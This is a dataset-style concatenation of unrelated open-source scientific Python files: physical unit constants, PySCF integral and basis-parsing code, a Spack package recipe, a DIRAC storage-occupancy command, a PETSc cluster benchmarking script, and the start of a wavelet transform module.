#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from math import pi
import random
__version__ = 1.13
def reset_units(seed=None):
"""
Set all units to new, self-consistent, floating-point values. See package
documentation for detailed explanation and examples:
http://pypi.python.org/pypi/numericalunits
reset_units() --> units are randomized. This is the suggested use. Run this
before your calculation, display the final answer, then re-run this, then
re-display the final answer. If you get the same answers both times, then
your calculations are almost guaranteed to be free of
dimensional-analysis-violating errors. reset_units() is run automatically
the first time this module is imported.
reset_units('SI') --> Set units so that all values are given in standard SI
units (meters-kilograms-seconds) by default. In this mode, there is no way
to test for dimensional-analysis-violating errors.
reset_units(x) --> If you pass any other argument x, it's used as the seed
for the random number generator.
"""
global m, kg, s, C, K
if seed == 'SI':
m = 1.
kg = 1.
s = 1.
C = 1.
K = 1.
else:
prior_random_state = random.getstate()
if seed is None:
random.seed()
else:
random.seed(seed)
m = 10. ** random.uniform(-1,1) #meter
kg = 10. ** random.uniform(-1,1) #kilogram
s = 10. ** random.uniform(-1,1) #second
C = 10. ** random.uniform(-1,1) # coulombs
K = 10. ** random.uniform(-1,1) # kelvins
# Leave the random generator like I found it, in case something else is
# using it.
random.setstate(prior_random_state)
set_derived_units_and_constants()
return
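# Illustrative sketch (not part of the original file): the randomized-units
# check described in the docstring above. A dimensionally consistent result,
# once divided by explicit output units, is identical across two runs:
#
#   import numericalunits as nu
#   nu.reset_units()
#   E1 = (0.5 * 1.0*nu.kg * (3.0*nu.m/nu.s)**2) / nu.J   # kinetic energy in J
#   nu.reset_units()
#   E2 = (0.5 * 1.0*nu.kg * (3.0*nu.m/nu.s)**2) / nu.J
#   assert abs(E1 - E2) < 1e-9 * abs(E1)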
def set_derived_units_and_constants():
"""
Assuming that the base units (m, kg, s, C, K) have already been set as
floating-point values, this function sets all other units and constants
to the appropriate, self-consistent values.
"""
# Length
global cm, mm, um, nm, pm, fm, km, angstrom, lightyear, \
astro_unit, pc, kpc, Mpc, Gpc, inch, foot, mile, thou
cm = 1e-2 * m
mm = 1e-3 * m
um = 1e-6 * m
nm = 1e-9 * m
pm = 1e-12 * m
fm = 1e-15 * m
km = 1e3 * m
angstrom = 1e-10 * m
lightyear = 9460730472580800. * m
astro_unit = 149597870700. * m #astronomical unit
pc = (648000./pi) * astro_unit #parsec
kpc = 1e3 * pc
Mpc = 1e6 * pc
Gpc = 1e9 * pc
inch = 2.54 * cm
foot = 12. * inch
mile = 5280. * foot
thou = 1e-3 * inch #thousandth of an inch; also called mil
# Volume
global L, mL, uL, nL, pL, fL, aL, kL, ML, GL
L = 1e-3 * m**3 #liter
mL = 1e-3 * L
uL = 1e-6 * L
nL = 1e-9 * L
pL = 1e-12 * L
fL = 1e-15 * L
aL = 1e-18 * L
kL = 1e3 * L
ML = 1e6 * L
GL = 1e9 * L
# Time
global ms, us, ns, ps, fs, minute, hour, day, week, year
ms = 1e-3 * s
us = 1e-6 * s
ns = 1e-9 * s
ps = 1e-12 * s
fs = 1e-15 * s
minute = 60. * s
hour = 60. * minute
day = 24. * hour #solar day
week = 7. * day
year = 365.256363004 * day #sidereal year
# Frequency
global Hz, mHz, kHz, MHz, GHz, THz, PHz
Hz = 1./s
mHz = 1e-3 * Hz
kHz = 1e3 * Hz
MHz = 1e6 * Hz
GHz = 1e9 * Hz
THz = 1e12 * Hz
PHz = 1e15 * Hz
# Mass
global g, mg, ug, ng, pg, fg, tonne, amu, Da, kDa, lbm
g = 1e-3 * kg
mg = 1e-3 * g
ug = 1e-6 * g
ng = 1e-9 * g
pg = 1e-12 * g
fg = 1e-15 * g
tonne = 1e3 * kg
amu = 1.660538921e-27 * kg #atomic mass unit
Da = amu #Dalton
kDa = 1e3 * Da
lbm = 0.45359237 * kg # pound mass (international avoirdupois pound)
# Energy
global J, mJ, uJ, nJ, pJ, fJ, kJ, MJ, GJ, erg, eV, meV, keV, MeV, GeV, \
TeV, btu, smallcal, kcal, Wh, kWh
J = (kg * m**2)/s**2
mJ = 1e-3 * J
uJ = 1e-6 * J
nJ = 1e-9 * J
pJ = 1e-12 * J
fJ = 1e-15 * J
kJ = 1e3 * J
MJ = 1e6 * J
GJ = 1e9 * J
erg = 1e-7 * J
eV = 1.602176565e-19 * J
meV = 1e-3 * eV
keV = 1e3 * eV
MeV = 1e6 * eV
GeV = 1e9 * eV
TeV = 1e12 * eV
btu = 1055.056 * J #British thermal unit
smallcal = 4.184 * J #small calorie ("gram calorie")
kcal = 4184. * J #kilocalorie ("large Calorie", "dietary Calorie")
Wh = 3600. * J #watt-hour
kWh = 1e3 * Wh # kilowatt-hour
# Moles, concentration / molarity
global NA, mol, mmol, umol, nmol, pmol, fmol, M, mM, uM, nM, pM, fM
NA = 6.02214129e23 #Avogadro's number
mol = NA #1 mole (see README)
mmol = 1e-3 * mol
umol = 1e-6 * mol
nmol = 1e-9 * mol
pmol = 1e-12 * mol
fmol = 1e-15 * mol
M = mol/L # molar
mM = 1e-3 * M
uM = 1e-6 * M
nM = 1e-9 * M
pM = 1e-12 * M
fM = 1e-15 * M
# Force
global N, dyn, lbf
N = (kg * m)/s**2 #newton
dyn = 1e-5 * N #dyne
lbf = 4.4482216152605 * N #pound-force (international avoirdupois pound)
# Pressure
global Pa, hPa, kPa, MPa, GPa, bar, mbar, cbar, dbar, kbar, Mbar, atm, \
torr, mtorr, psi
Pa = N/m**2 #pascal
hPa = 1e2 * Pa #hectopascal
kPa = 1e3 * Pa
MPa = 1e6 * Pa
GPa = 1e9 * Pa
bar = 1e5 * Pa
mbar = 1e-3 * bar
cbar = 1e-2 * bar #centibar
dbar = 0.1 * bar #decibar
kbar = 1e3 * bar
Mbar = 1e6 * bar
atm = 101325. * Pa
torr = (1./760.) * atm
mtorr = 1e-3 * torr
psi = lbf / inch**2
# Power
global W, mW, uW, nW, pW, kW, MW, GW, TW
W = J/s
mW = 1e-3 * W
uW = 1e-6 * W
nW = 1e-9 * W
pW = 1e-12 * W
kW = 1e3 * W
MW = 1e6 * W
GW = 1e9 * W
TW = 1e12 * W
# Temperature
global degFinterval, degCinterval
degFinterval = (5./9.) * K # A temperature difference in degrees Fahrenheit
degCinterval = K # A temperature difference in degrees Celsius
# Charge
global mC, uC, nC, Ah, mAh
mC = 1e-3 * C
uC = 1e-6 * C
nC = 1e-9 * C
Ah = 3600. * C #amp-hour
mAh = 1e-3 * Ah
# Current
global A, mA, uA, nA, pA, fA
A = C/s
mA = 1e-3 * A
uA = 1e-6 * A
nA = 1e-9 * A
pA = 1e-12 * A
fA = 1e-15 * A
# Voltage
global V, mV, uV, nV, kV, MV, GV, TV
V = J/C
mV = 1e-3 * V
uV = 1e-6 * V
nV = 1e-9 * V
kV = 1e3 * V
MV = 1e6 * V
GV = 1e9 * V
TV = 1e12 * V
# Resistance and conductivity
global ohm, mohm, kohm, Mohm, Gohm, S, mS, uS, nS
ohm = V / A
mohm = 1e-3 * ohm
kohm = 1e3 * ohm
Mohm = 1e6 * ohm
Gohm = 1e9 * ohm
S = 1./ohm #siemens
mS = 1e-3 * S
uS = 1e-6 * S
nS = 1e-9 * S
# Magnetic fields and fluxes
global T, mT, uT, nT, G, mG, uG, kG, Oe, Wb
T = (V * s) / m**2 #tesla
mT = 1e-3 * T
uT = 1e-6 * T
nT = 1e-9 * T
G = 1e-4 * T #gauss
mG = 1e-3 * G
uG = 1e-6 * G
kG = 1e3 * G
Oe = (1000./(4.*pi)) * A/m #oersted
Wb = J/A #weber
# Capacitance and inductance
global F, uF, nF, pF, fF, aF, H, mH, uH, nH
F = C / V #farad
uF = 1e-6 * F
nF = 1e-9 * F
pF = 1e-12 * F
fF = 1e-15 * F
aF = 1e-18 * F
H = m**2 * kg / C**2 #henry
mH = 1e-3 * H
uH = 1e-6 * H
nH = 1e-9 * H
#Constants--general
global c0, mu0, eps0, Z0, hPlanck, hbar, kB, GNewton, sigmaSB, alphaFS
c0 = 299792458. * m/s #speed of light in vacuum
mu0 = 4. * pi * 1e-7 * N/A**2 #magnetic constant, permeability of vacuum
eps0 = 1./(mu0 * c0**2) #electric constant, permittivity of vacuum
Z0 = mu0 * c0 #vacuum impedance, 377 ohms
hPlanck = 6.62606957e-34 * J*s #planck constant
hbar = hPlanck / (2.*pi) #reduced planck constant
kB = 1.3806488e-23 * J/K #Boltzmann constant
GNewton = 6.67384e-11 * m**3 / (kg * s**2) #Gravitational constant
sigmaSB = 5.670373e-8 * W / (m**2 * K**4) #Stefan-Boltzmann constant
alphaFS = 7.2973525698e-3 #fine-structure constant
#Constants--chemistry, atomic physics, electrons
global Rgas, e, uBohr, uNuc, aBohr, me, mp, mn, Rinf, Ry, \
ARichardson, Phi0, KJos, RKlitz
Rgas = kB #ideal gas constant (see README)
e = 1.602176565e-19 * C #charge of proton
uBohr = 9.27400968e-24 * J/T #Bohr magneton
uNuc = 5.05078353e-27 * J/T #nuclear magneton
aBohr = 0.52917721092e-10 * m #Bohr radius
me = 9.10938291e-31 * kg #electron mass
mp = 1.672621777e-27 * kg #proton mass
mn = 1.674927351e-27 * kg #neutron mass
Rinf = 10973731.568539 / m #Rydberg constant
Ry = 2.179872171e-18 * J #Rydberg energy, approximately 13.6 eV
ARichardson = (4.*pi*e*me*kB**2) / hPlanck**3 #Richardson constant
Phi0 = 2.067833758e-15 * Wb #magnetic flux quantum
KJos = 4.83597870e14 * Hz / V #Josephson constant
RKlitz = 2.58128074434e4 * ohm #von Klitzing constant
#Constants--astronomical and properties of earth
global REarth, g0, Msolar, MEarth
REarth = 6371. * km #radius of earth
g0 = 9.80665 * m / s**2 #standard earth gravitational acceleration
Msolar = 1.98892e30 * kg #mass of the sun
MEarth = 5.9736e24 * kg #mass of earth
# Set units randomly when this module is initialized. (Don't worry: If the
# module is imported many times from many places, this command will only
# execute during the first import.)
reset_units()
if False: #workaround so that Spyder IDE recognizes these variables as globals
m=1
kg=1
s=1
K=1
C=1
|
schoolie/numericalunits
|
numericalunits.py
|
Python
|
mit
| 10,760
|
[
"Avogadro",
"Dalton"
] |
0c122dcadd2ce10630a4c94329a6f124aea195f385a20d5be37ce04d67adc73e
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Integrals for spin-orbit coupling
See also functions make_h1_soc, direct_spin_spin in pyscf/prop/zfs/uhf.py
'''
import numpy
from pyscf import gto
from pyscf import lib
mol = gto.M(
verbose = 0,
atom = 'C 0 0 0; O 0 0 1.5',
basis = 'ccpvdz'
)
# J Chem Phys, 122, 034107, Eq (2)
mat = 0
for atm_id in range(mol.natm):
mol.set_rinv_orig(mol.atom_coord(atm_id))
chg = mol.atom_charge(atm_id)
mat -= chg * mol.intor('int1e_prinvxp_sph')
# J Chem Phys, 122, 034107, Eq (3)
# (reuses the name `mat`; the one-electron part above is only a separate demo)
mat = mol.intor('int2e_p1vxp1_sph') # (3,n*n,n*n) array, 3 for x,y,z components
# spin-spin dipole-dipole coupling integrals
# Chem Phys 279, 133, Eq (1)
def ss(mol):
n = mol.nao_nr()
mat1 = mol.intor('int2e_ip1ip2_sph').reshape(3,3,n,n,n,n) # <nabla1 nabla2 | 1 2>
mat2 =-mat1.transpose(0,1,2,3,5,4) # <nabla1 2 | 1 nabla2>
mat3 =-mat2.transpose(1,0,3,2,4,5) # <1 nabla2 | nabla1 2>
mat4 = mat1.transpose(0,1,3,2,5,4) # <1 2 | nabla1 nabla2>
mat = mat1 - mat2 - mat3 + mat4
# Fermi contact term
h_fc = mol.intor('int4c1e').reshape(n,n,n,n) * (4*numpy.pi/3)
mat[0,0] -= h_fc
mat[1,1] -= h_fc
mat[2,2] -= h_fc
s = lib.PauliMatrices * .5
# wxyz are the spin indices, ijkl are the AO indices
alpha = 137.036 # NB: 137.036 is 1/alpha (speed of light in a.u.), despite the name
fac = alpha ** 2 / 2
# s has shape (3,2,2); contract the full Pauli matrices, not a scalar slice
mat = numpy.einsum('swx,tyz,stijkl->wxyzijkl', s, s, mat) * fac
return mat
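# Illustrative sketch (not part of the original file): evaluating the
# spin-spin tensor defined above.
#
# mat_ss = ss(mol)
# n = mol.nao_nr()
# print(mat_ss.shape) # expected (2, 2, 2, 2, n, n, n, n): spins wxyz, AOs ijkl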
|
gkc1000/pyscf
|
examples/gto/20-soc_ao_integrals.py
|
Python
|
apache-2.0
| 1,462
|
[
"PySCF"
] |
b29a2ef02094a1836725ad4c3c3f399f544c80c50894a657dc83048bef9fb05d
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPhonopy(PythonPackage):
"""Phonopy is an open source package for phonon
calculations at harmonic and quasi-harmonic levels."""
homepage = "http://atztogo.github.io/phonopy/index.html"
url = "http://sourceforge.net/projects/phonopy/files/phonopy/phonopy-1.10/phonopy-1.10.0.tar.gz"
version('1.10.0', '973ed1bcea46e21b9bf747aab9061ff6')
depends_on('py-numpy', type=('build', 'run'))
depends_on('py-scipy', type=('build', 'run'))
depends_on('py-matplotlib', type=('build', 'run'))
depends_on('py-pyyaml', type=('build', 'run'))
|
krafczyk/spack
|
var/spack/repos/builtin/packages/py-phonopy/package.py
|
Python
|
lgpl-2.1
| 1,833
|
[
"phonopy"
] |
33a189cf07ca08589f53fda5208b006d7b48d004073fb560e9c4d71c6d26d8a0
|
# $HeadURL: $
''' SpaceTokenOccupancyCommand
The Command gets information of the SpaceTokenOccupancy from the lcg_utils
'''
import lcg_util
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import pythonCall
from DIRAC.ResourceStatusSystem.Command.Command import Command
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient
from DIRAC.ResourceStatusSystem.Utilities import CSHelpers
__RCSID__ = '$Id: $'
class SpaceTokenOccupancyCommand( Command ):
'''
Uses lcg_util to query status of endpoint for a given token.
'''
def __init__( self, args = None, clients = None ):
super( SpaceTokenOccupancyCommand, self ).__init__( args, clients )
if 'ResourceManagementClient' in self.apis:
self.rmClient = self.apis[ 'ResourceManagementClient' ]
else:
self.rmClient = ResourceManagementClient()
def _storeCommand( self, results ):
'''
Stores the results of doNew method on the database.
'''
for result in results:
resQuery = self.rmClient.addOrModifySpaceTokenOccupancyCache( result[ 'Endpoint' ],
result[ 'Token' ],
result[ 'Total' ],
result[ 'Guaranteed' ],
result[ 'Free' ] )
if not resQuery[ 'OK' ]:
return resQuery
return S_OK()
def _prepareCommand( self ):
'''
SpaceTokenOccupancy requires one argument:
- elementName : <str>
Given a (storage)elementName, we calculate its endpoint and spaceToken,
which are used to query the srm interface.
'''
if not 'name' in self.args:
return S_ERROR( '"name" not found in self.args' )
elementName = self.args[ 'name' ]
endpoint = CSHelpers.getStorageElementEndpoint( elementName )
if not endpoint[ 'OK' ]:
return endpoint
endpoint = endpoint[ 'Value' ]
spaceToken = CSHelpers.getSEProtocolOption( elementName, 'SpaceToken' )
if not spaceToken[ 'OK' ]:
return spaceToken
spaceToken = spaceToken[ 'Value']
return S_OK( ( endpoint, spaceToken ) )
def doNew( self, masterParams = None ):
'''
Gets the parameters to run, either from the master method or from its
own arguments.
It queries the srm interface, and hopefully it will not crash. Out of the
results, we keep totalsize, guaranteedsize, and unusedsize.
Then, they are recorded and returned.
'''
if masterParams is not None:
spaceTokenEndpoint, spaceToken = masterParams
else:
params = self._prepareCommand()
if not params[ 'OK' ]:
return params
spaceTokenEndpoint, spaceToken = params[ 'Value' ]
# 10 secs of timeout. If it works, the reply is immediate.
occupancy = pythonCall( 10, lcg_util.lcg_stmd, spaceToken, spaceTokenEndpoint, True, 0 )
if not occupancy[ 'OK' ]:
return occupancy
occupancy = occupancy[ 'Value' ]
#Timeout does not work here...
#occupancy = lcg_util.lcg_stmd( spaceToken, spaceTokenEndpoint, True, 0 )
if occupancy[ 0 ] != 0:
return S_ERROR( occupancy )
output = occupancy[ 1 ][ 0 ]
sTokenDict = {}
sTokenDict[ 'Endpoint' ] = spaceTokenEndpoint
sTokenDict[ 'Token' ] = spaceToken
sTokenDict[ 'Total' ] = float( output.get( 'totalsize', '0' ) ) / 1e12 # Bytes to Terabytes
sTokenDict[ 'Guaranteed' ] = float( output.get( 'guaranteedsize', '0' ) ) / 1e12
sTokenDict[ 'Free' ] = float( output.get( 'unusedsize', '0' ) ) / 1e12
storeRes = self._storeCommand( [ sTokenDict ] )
if not storeRes[ 'OK' ]:
return storeRes
return S_OK( [ sTokenDict ] )
def doCache( self ):
'''
Method that reads the cache table and tries to read from it. It will
return a list of dictionaries if there are results.
'''
params = self._prepareCommand()
if not params[ 'OK' ]:
return params
spaceTokenEndpoint, spaceToken = params[ 'Value' ]
result = self.rmClient.selectSpaceTokenOccupancyCache( spaceTokenEndpoint, spaceToken )
if result[ 'OK' ]:
result = S_OK( [ dict( zip( result[ 'Columns' ], res ) ) for res in result[ 'Value' ] ] )
return result
def doMaster( self ):
'''
Master method. Gets all endpoints from the storage elements and all
the spaceTokens. Could have taken from Shares/Disk as well.
It queries for all their possible combinations, unless there are records
in the database for those combinations, which then are not queried.
'''
storageElementNames = CSHelpers.getStorageElements()
if not storageElementNames[ 'OK' ]:
return storageElementNames
storageElementNames = storageElementNames[ 'Value' ]
endpointTokenSet = set()
for storageElementName in storageElementNames:
endpoint = CSHelpers.getStorageElementEndpoint( storageElementName )
if not endpoint[ 'OK' ]:
continue
endpoint = endpoint[ 'Value' ]
spaceToken = CSHelpers.getStorageElementSpaceToken( storageElementName )
if not spaceToken[ 'OK' ]:
continue
spaceToken = spaceToken[ 'Value' ]
endpointTokenSet.add( ( endpoint, spaceToken ) )
gLogger.verbose( 'Processing %s' % endpointTokenSet )
for elementToQuery in endpointTokenSet:
result = self.doNew( elementToQuery )
if not result[ 'OK' ]:
self.metrics[ 'failed' ].append( result )
return S_OK( self.metrics )
#...............................................................................
#EOF
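# Illustrative sketch (not part of the original file): DIRAC commands return
# S_OK / S_ERROR result dictionaries, so a caller unwraps them like this
# ('SOME-SE' is a made-up storage-element name):
#
#   command = SpaceTokenOccupancyCommand( args = { 'name' : 'SOME-SE' } )
#   result = command.doCache()
#   if result[ 'OK' ]:
#     for row in result[ 'Value' ]:
#       print row[ 'Endpoint' ], row[ 'Token' ], row[ 'Free' ]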
|
Sbalbp/DIRAC
|
ResourceStatusSystem/Command/SpaceTokenOccupancyCommand.py
|
Python
|
gpl-3.0
| 6,129
|
[
"DIRAC"
] |
8d19b79a8846971db9b9860e216e9a1253e23a662051a956e127d2a577ada740
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Timothy Berkelbach <tim.berkelbach@gmail.com>
#
'''
parse CP2K format
'''
import re
from pyscf.gto.basis import parse_nwchem
MAXL = 8
def parse(string, optimize=False):
'''Parse the basis text which is in CP2K format, return an internal
basis format which can be assigned to :attr:`Mole.basis`
Lines started with # are ignored.
'''
bastxt = []
for dat in string.splitlines():
x = dat.split('#')[0].strip()
if (x and not x.startswith('END') and not x.startswith('BASIS')):
bastxt.append(x)
return _parse(bastxt, optimize)
def load(basisfile, symb, optimize=False):
return _parse(search_seg(basisfile, symb), optimize)
def _parse(blines, optimize=False):
header_ln = blines.pop(0)
nsets = int(blines.pop(0))
basis = []
for n in range(nsets):
comp = [int(p) for p in blines.pop(0).split()]
n, lmin, lmax, nexps, ncontractions = comp[0], comp[1], comp[2], comp[3], comp[4:]
basis_n = [[l] for l in range(lmin,lmax+1)]
for nexp in range(nexps):
bfun = [float(x) for x in blines.pop(0).split()]
exp = bfun.pop(0)
for i,l in enumerate(range(lmin,lmax+1)):
cl = [exp]
for c in range(ncontractions[i]):
cl.append(bfun.pop(0))
basis_n[i].append(tuple(cl))
basis.extend(basis_n)
basis_sorted = []
for l in range(MAXL):
basis_sorted.extend([b for b in basis if b[0] == l])
if optimize:
basis_sorted = parse_nwchem.optimize_contraction(basis_sorted)
basis_sorted = parse_nwchem.remove_zero(basis_sorted)
return basis_sorted
BASIS_SET_DELIMITER = re.compile('# *BASIS SET.*\n')
def search_seg(basisfile, symb):
with open(basisfile, 'r') as fin:
fdata = re.split(BASIS_SET_DELIMITER, fin.read())
for dat in fdata[1:]:
dat0 = dat.split(None, 1)
if dat0 and dat0[0] == symb:
# remove blank lines
return [x.strip() for x in dat.splitlines()
if x.strip() and 'END' not in x]
raise RuntimeError('Basis not found for %s in %s' % (symb, basisfile))
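# Illustrative sketch (not part of the original file): the CP2K format parsed
# above is "element basis-name", a set count, then per set a header line
# "n lmin lmax nexp ncontr..." followed by one exponent-plus-coefficients
# line per primitive. The numbers below are made up for demonstration:
#
#   sample = """
#   H DEMO-BASIS
#   1
#   1 0 0 2 1
#   1.30 0.43
#   0.23 0.68
#   """
#   basis = parse(sample)   # -> [[0, (1.30, 0.43), (0.23, 0.68)]]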
|
gkc1000/pyscf
|
pyscf/pbc/gto/basis/parse_cp2k.py
|
Python
|
apache-2.0
| 2,822
|
[
"CP2K",
"PySCF"
] |
df676e6e398d00f170f8bd9b48f296645b207a9073a06108a90bdaba026dec3a
|
#!/usr/bin/env python
# This script requires all matrices to be in PETSc binary format in the petsc subdir
import sys, os, glob, random
import commands # Python 2 stdlib module; used by getJobs() below
import datetime,time
from solvers import *
petsc = False
if petsc:
tmdir = 'timing-aciss'
matrixsubdir = 'petsc'
petsc_matrix_suffix='.petsc'
donefile = 'DONE'
jobname = 'petsc'
else:
tmdir = 'timing-moose-aciss'
matrixsubdir = 'moose'
petsc_matrix_suffix='.mat'
donefile = 'DONE_moose'
jobname = 'moose'
#jobname = 'default'
def resetBuffer():
global tmdir
#b = '#!/bin/bash\n\nmodule load mpi/mpich-3.1_gcc-4.9\n\n'
b = '#!/bin/bash\n\nmodule load gcc/4.9\n\n'
b += 'export PETSC_DIR=/home11/bnorris2/petsc/petsc-3.5.3; export PETSC_ARCH=arch-linux2-c-mpich3.1-gcc4.9\n\n'
b += 'export LD_LIBRARY_PATH=$PETSC_DIR/$PETSC_ARCH/lib:$LD_LIBRARY_PATH\n\n'
b += 'cd /home11/bnorris2/UFloridaSparseMat/%s\n\n' % tmdir
return b
def getJobs():
s = commands.getstatusoutput('qstat -a | grep norris | grep %s | wc -l' % jobname)[1]
return int(s)
# Directory contaning the *.petsc matrices:
#wdir='/gpfs/mira-fs0/projects/PEACEndStation/norris/UFloridaSparseMat/'
wdir='/home11/bnorris2/UFloridaSparseMat/'
# Directory for storing results:
tdir=wdir + tmdir + '/'
mdir=wdir + matrixsubdir + '/'
cdir='/home11/bnorris2/research/lighthouse/sandbox/petsc/new/' #os.getcwd()
#nprocs = 4096 # run with qsub -n 256 --proccount 4096 --mode c16 -t 60
nprocs = 2048 # run with qsub -n 128 --proccount 2048 --mode c16 -t 60
#nprocs = 1024 # run with qsub -n 256 --proccount 1024 --mode c4 -t 60
p = 16
matrices = glob.glob(mdir+'/*%s' % petsc_matrix_suffix) # suffix already includes the dot
donelist=[]
# DONE_TRILINOS
if os.path.exists(donefile):
donelist=open(donefile,'r').readlines()
else:
print "Error: can't find done matrix file"
exit(1)
#if (getJobs() > 0):
#donelist = list(reversed(donelist))
solveropts = getsolvers()
buf = resetBuffer()
cleanup = 'wait\n'
totalprocs = 1
env = os.environ
hashlist = solveropts.keys()
random.shuffle(hashlist)
#print "Hi", tdir
for hashnum in hashlist:
solver_optstr = solveropts[hashnum]
if totalprocs > nprocs: break
for matname in donelist:
while (getJobs() > 20): time.sleep(60)
matname = matname.strip()
matrixpath=mdir+matname+petsc_matrix_suffix
if not os.path.exists(matrixpath):
print "No PETSc matrix:", matrixpath
continue
else:
print "PETSc matrix:", matrixpath
if totalprocs > nprocs: break
logfile = tdir + '%s.%s.log' % (matname, str(hashnum))
lockfile = tdir + '.%s.%s.log' % (matname, str(hashnum))
print "Logfile:", logfile
if os.path.exists(lockfile) or os.path.exists(logfile): continue
else: os.system("echo %s > %s" % (matname,lockfile))
opts = [' -f ',mdir+matname+petsc_matrix_suffix, ' -hash', hashnum, solver_optstr, ' -logfile', logfile, ' -ksp_view -log_summary -options_left -ksp_error_if_not_converged 1 -ksp_converged_reason ']
cmd = os.path.join(cdir,'solvers-aciss')
#buf += 'runjob --np 1 -p ' + str(p) + ' --block $COBALT_PARTNAME --verbose=INFO : ' + cmd + ' ' + ' '.join(opts) + ' > ' + logfile + ' \n'
#buf += 'mpiexec -np 1 ' + cmd + ' '.join(opts) + ' > ' + logfile + ' \n'
buf += cmd + ' '.join(opts) + '; \n'
print cmd + ' ' + ' '.join(opts)
pbsscriptfile = '%s/.timing_%s_%s.sh' % (tdir,matname,str(hashnum))
f = open(pbsscriptfile,'w')
f.write(buf)
f.close()
qsubcmd='qsub -q short -N "%s" -l walltime=4:00:00 %s' % (jobname,pbsscriptfile)
ts = time.time()
ts = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print ts, '\n', qsubcmd
os.system(qsubcmd)
|
LighthouseHPC/lighthouse
|
sandbox/petsc/new/solverscript-aciss.py
|
Python
|
mit
| 3,666
|
[
"MOOSE"
] |
cbb318b2ae9a64c6fa0391405f975d7d4d6be026e240ecb1075ef040477fc334
|
"""
created on Feb 3, 2014
@author: Nikola Jajcay, jajcay(at)cs.cas.cz
inspired by A Practical Guide to Wavelet Analysis by Ch. Torrence and G. Compo
-- http://paos.colorado.edu/research/wavelets/ --
"""
import numpy as np
from scipy.fftpack import fft, ifft
from scipy.special import gamma
def morlet(k, scale, k0 = 6.):
"""
Returns the Morlet wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space.
Morlet wavelet: psi(x) = pi^(-1/4) * exp(i*k0*x) * exp(-x^2 / 2)
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - wavenumber
"""
exponent = - np.power((scale * k - k0),2) / 2. * (k > 0.)
norm = np.sqrt(scale * k[1]) * (np.power(np.pi, -0.25)) * np.sqrt(len(k))
output = norm * np.exp(exponent)
output *= (k > 0.)
fourier_factor = (4 * np.pi) / (k0 + np.sqrt(2 + np.power(k0,2)))
coi = fourier_factor / np.sqrt(2.)
return output, fourier_factor, coi
def paul(k, scale, k0 = 4.):
"""
Returns the Paul wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space.
Paul wavelet: psi(x) = (2^m * i^m * m!) / sqrt(pi * (2m)!) * (1 - ix)^(-(m+1))
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - order
"""
# the Paul wavelet decays as exp(-s*k) in Fourier space (no square)
exponent = - (scale * k) * (k > 0.)
norm = np.sqrt(scale * k[1]) * (np.power(2,k0) / np.sqrt(k0 * np.prod(np.arange(2,2*k0)))) * np.sqrt(len(k))
output = norm * np.power((scale * k),k0) * np.exp(exponent)
output *= (k > 0.)
fourier_factor = (4 * np.pi) / (2 * k0 + 1)
coi = fourier_factor * np.sqrt(2.)
return output, fourier_factor, coi
def DOG(k, scale, k0 = 2.):
"""
Returns the Derivative of Gaussian wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space. For m = 2 this wavelet is the Marr or
Mexican hat wavelet.
DOG wavelet: psi(x) = (-1)^(m+1) / sqrt (gamma(m+1/2)) * (d^m / dx^m) exp(-x^2 / 2)
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - derivative
"""
exponent = - np.power((scale * k),2) / 2.
norm = np.sqrt(scale * k[1] / gamma(k0 + 0.5)) * np.sqrt(len(k))
output = - norm * np.power(1j,k0) * np.power((scale * k),k0) * np.exp(exponent)
fourier_factor = 2 * np.pi * np.sqrt(2 / (2 * k0 + 1))
coi = fourier_factor / np.sqrt(2.)
return output, fourier_factor, coi
def continous_wavelet(X, dt, pad = False, wavelet = morlet, **kwargs):
"""
Computes the wavelet transform of the vector X, with sampling rate dt.
inputs:
X - the time series, numpy array
dt - sampling time (the time step between consecutive samples)
pad - if True, pad time series with 0 to get len(X) up to the next higher power of 2. It speeds up the FFT.
wavelet - which mother wavelet should be used. (morlet, paul, DOG)
--- kwargs ---
